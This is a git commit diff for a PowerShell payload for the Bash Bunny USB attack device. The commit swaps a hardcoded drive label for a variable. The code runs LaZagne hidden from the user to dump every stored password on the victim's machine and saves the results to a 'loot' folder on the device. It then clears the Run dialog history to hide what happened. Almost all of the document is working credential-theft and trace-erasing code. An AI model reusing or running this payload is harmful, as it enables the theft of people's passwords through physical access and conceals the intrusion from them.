Update payload.ps1

added missed $drivelabel reference
pull/691/head
Rafa Guillermo 2024-09-30 20:21:11 +02:00 committed by GitHub
parent 774cc77212
commit f7cf46fd95
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 2 additions and 2 deletions

View File

@ -2,5 +2,5 @@ $drivelabel = 'BashBunny'
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber') $dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
$filter = 'password_'+ $env:COMPUTERNAME $filter = 'password_'+ $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) $filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt') Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue